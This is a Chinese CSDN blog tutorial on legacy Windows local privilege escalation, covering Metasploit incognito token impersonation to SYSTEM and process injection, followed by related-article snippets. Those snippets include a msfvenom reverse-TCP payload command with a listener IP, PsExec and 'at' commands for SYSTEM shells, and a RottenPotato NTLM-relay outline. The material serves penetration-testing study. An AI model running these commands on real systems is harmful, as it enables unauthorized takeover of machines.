提权—win本地提权令牌窃取&进程注入

已于 2022-02-02 18:30:53 修改
阅读量1.2k 收藏 1
点赞数 2
分类专栏: # 权限提升 文章标签: 安全 web安全 https
于 2022-02-02 15:59:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qi_SJQ_/article/details/122768457
版权
本文回顾了Windows系统中早期的提权手段,包括WinServer08/Win7时期的令牌窃取方法,以及适用于低版本系统的进程注入技术。介绍了漏洞原理、工具使用和提权流程,强调了这些技术在高版本系统中的局限性。
摘要由CSDN通过智能技术生成

之前介绍的是web环境下的提权方式,而本地提权先介绍这两种方法,但适用范围受版本限制较大。
在这里插入图片描述

Winserver08&win7令牌窃取:

成因:进行远程过程调用时请求提升权限,然后调用它从而生成特权安全令牌以执行特权操作。当系统允许令牌不仅用于进程本身,还用于原始请求进程时,漏洞就会出现。

工具:msf

何为令牌(参考):
在这里插入图片描述

令牌窃取方式在Windows2008之后的高版本操作系统已经没用了,只能用于一些低版本系统,比如:
Microsoft Windows XP Professional SP3和之前版本
Windows Server 2003 SP2和之前的版本
Windows Server 2003 x64和x64 SP2
Windows Server 2003 (用于基于Itanium的系统SP2和先前版本)
Windows Server 2008 x32 x64
Windows Server 2008 (用于基于Itanium的系统)
Windows Vista SP1和之前的版本
Windows Vista x64 SP1和之前的版本

提权流程:获取会话-利用msf模块-窃取令牌-提权

生成木马在目标执行,监听端口,查看用户权限:
在这里插入图片描述
执行msf命令模板,窃取令牌:

use incognito  # 进入incognito
list_tokens -u # 列出令牌
impersonate_token "NT AUTHORITY\SYSTEM"  # 令牌假冒 SYSTEM

在这里插入图片描述
参考:
https://blog.csdn.net/weixin_40412037/article/details/121651960

进程注入

成因:进程注入提权是本地提权方式的一种较为老的安全技术了,利用的是注入进程的所有者实现权限共享机制,这类技术主要利用在Windows2008之前的操作系统上,所以我们需要学习后续的本地提权更多的手法才能针对高版本的系统。

在这里插入图片描述
有一款个人开发的工具(pexec64 32 进程注入工具针对-win2008 及后操作系统,工具不太靠谱):
https://cnblogs.com/LyShark/p/13785619.html

//  其实这两个windows提权技术都挺老了,适用范围不大,实用性也是...有个印象就行了。
暮w光
关注
专栏目录
权限提升——windows进程注入&令牌窃取&土豆&BypassUAC&DLL文件劫持&不带引号服务路径
m0_61506558的博客
01-15 930
RottenPotato (烂土豆)提权的原理可以简述如下: 1.欺骗“NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。 2.对这个认证过程使用中间人攻击(NTLM重放),为“NTAUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通过—系列的Windows API调用实现的。 3.模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数的服务型账户(IIS、MSSQL等)有这个权限,大多数用户级的账户没有这个权限。
红队内网攻防渗透:内网渗透之windows内网权限提升技术:服务启动&远程控制&进程启动&令牌窃取
HACKONE的博客
06-02 119
这里如果把shell注入到system的进程中就是system权限,但是中途如果要迁移shell到别的进程,需要看用户名权限,如果system迁移到administrator就是降权,如果administrator迁移到system就是提权。获取的权限是administrator,然后用一下所讲的技术进行提权和降权,如果是users的权限,以下技术是用不到的。这里是降权,选择权限是amdinistrator的权限进行注入,就会产生新的admin的权限shell回来。服务启动后上线的是system权限。
Windows本地提权
ximo的博客
03-20 510
1.PsExec提权 PsExec -i -s cmd //-i 交互式 -s syetem权限 打开cmd窗口 2.at 方式提权(xp,2003) at 00:00 /interactive cmd 指定时间执行cmd,获得system权限。 操作系统中,who执行命令,命令就拥有who权限。 使用system打开任务管理器: taskmgr 结束explorer.exe(桌面进程,权限为管理员): 桌面图标消失,任务栏消失。 再打开一个桌面进程(文件,创建新任务): 权限为系
权限提升-令牌窃取&进程注入-提权
weixin_45701675的博客
11-19 406
令牌窃取 演示服务器: Win2012 腾讯云服务器 假冒令牌可以假冒一个网络中的另一个用户进行各类操作。 所以当一个攻击者需要域管理员的操作权限时候,需通过假冒域管理员的令牌进行攻击。 本地权限 - Test in Win2012腾讯云服务器 msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=3333 -f exe -o msf.exe 配置监听会话 use exploit/multi/han...
Windows提权---本地提权
qq_40012781的博客
07-02 503
使用本地提权,优势在于简单方便....
SysinternalsSuite本地提权&&提权进程注入学习
永不垂头的博客
08-26 434
SysinternalsSuite本地提权&&提权进程注入学习 文章目录SysinternalsSuite本地提权&&提权进程注入学习一、SysinternalsSuite本地提权二、提权进程注入学习三、我的公众号 一、SysinternalsSuite本地提权 下载网址:https://docs.microsoft.com/zhcn/sysinternals/downloads/sysinternals-suite 找到kali中的whoami.exe放到web
第101天:权限提升-Win本地用户&进程注入&令牌窃取&AT&SC&PS服务命令
09-15
针对Windows本地用户的权限提升,可以使用进程注入令牌窃取以及AT、SC和PS服务命令等方法。进程注入是指将恶意代码注入到系统进程中,从而获取系统权限。令牌窃取指利用某些漏洞获取管理员权限令牌,然后使用这些...
权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC
xiaoheizi的博客
08-30 1500
进程迁移注入提权就是将获取到权限低的进程注入进程中权限高的中,这样就实现了权限提升,同时注入进程提权相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现。操作数据库的权限,数据库的增删改等,源码或配置文件泄漏,也可能是网站权限(webshell)进行的数据库配置文件读取获得。原理:把我的进程注入到一个现有的system账号运行的进程中,这样我的进程也就具有了system账号的权限了。程序路径:Potato/source/Potato/Potato/bin/Release/Potato.exe。
web权限提升-令牌窃取&烂土豆&dll劫持
m0_61506558的博客
10-20 503
通过中间人攻击,将COM(NT\SYSTEM权限)在第二步挑战应答过程中认证的区块改成自己的区块获取SYSTEM令牌,然后利用msf的模仿令牌功能模仿SYSTEM令牌。dll劫持提权需要特定软件应用的控制权限及启用配合,复杂鸡肋AlwaysInstallElevated提权默认禁用配置,利用成功机会很少(四)不带引号服务路径配合MSF-webWindows服务运行时,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完整路径,则系统会按字面解释它并执行(如图1)。
Windows提权令牌窃取
ssrf
03-04 686
令牌(Token) 令牌(token)是系统的临时秘钥,相当于账号和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌将持续存在于系统中,除非系统重新启动。令牌最大的特点就是随机性,不可预测,黑客或软件无法猜测出令牌。 假冒令牌可以假冒一个网络中的另一个用户进行各类操作。所以当一个攻击者需要域管理员的操作权限时候,需要通过假冒域管理员的令牌进行攻击。 令牌有很多种: 访问令牌(Access Token):表示访问控制操作主体的
Windows 进程权限浅谈 -- 提权 / 降权
0x0007 的博客
03-24 2735
Windows 上,用户对权限并不敏感,可能最为直观的是 UAC ,但相信很多人已经关掉了它的提示。但其实安全性早已深入了 Windows 的方方面面。Windows Vista 引入了一个称为强制完整性控制()的新安全结构,类似于 Linux/Unix 中可用的完整性功能。在 Windows Vista 以及后续版本如Windows 11/10和Windows 8/7中,所有安全主体(用户、计算机、服务等)和对象(文件、注册表键、文件夹和资源)都被赋予MIC标签。
windows系统权限提升
weixin_53639243的博客
04-23 3230
提权方法。
提权 - Windows 令牌窃取/进程注入提权
acepanhuan的博客
03-01 631
提权 - Windows 令牌窃取/进程注入提权
windows本地提权--令牌窃取&烂土豆&UAC
金灰的博客
04-23 497
免责声明:本文仅做技术交流与学习,请知法守法,不要乱搞破坏等等...本地--->system。
windows权限提升-WIN提权
最新发布
2401_84466224的博客
06-16 1819
Windows系统内置了许多本地用户组,这些用户组本身都已经被赋予一些权限(permissions),它们具有管理本地计算机或访问本地资源的权限。只要用户账户加入到这些本地组内,这回用户账户也将具备该组所拥有的权限。
Windows Access Token
purvispanwu的博客
12-04 714
Windows Token
MSF令牌窃取
qq_53365842的博客
04-28 1749
令牌简介及原理 ● 令牌就是系统的临时密钥,相当于账户名和密码,原来决定是否允许这次请求和判断是属于哪一个用户的,他允许你不提供密码或其他凭证的前提下访问网络和系统资源 ● 令牌最大的特点就是随机性,不可预测,一般黑客或软件无法猜测出来 ● 令牌有很多种: 访问令牌(Access Token)表示访问和控制操作主题的系统对象 密保令牌(Security Tocken)是一种计算机身份校验的物理设备 会话令牌(Session Tocken)的交互会话中唯一的身份标识符 实战利用 (1)先把目标打下来 (.
Windows令牌窃取提权和烂土豆提权学习
Goodric的博客
07-24 1800
令牌,又叫token,是系统临时产生的秘钥,相当于账号密码,用来决定是否允许此次请求和判断此次请求是属于哪一个用户。令牌无需提供密码或其他凭证,就可以访问网络和系统资源,这些令牌持续于系统中,除非系统重新启动。令牌的最大特点就是随机性,不可预测,无法猜解。当不同的用户登录计算机后,都会生成一个访问令牌,这个Token在用户创建进程或线程时还会被使用,并不断进行拷贝,一般用户双击运行⼀个进程都会拷贝explorer.exe中的AccessToken令牌的分类。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值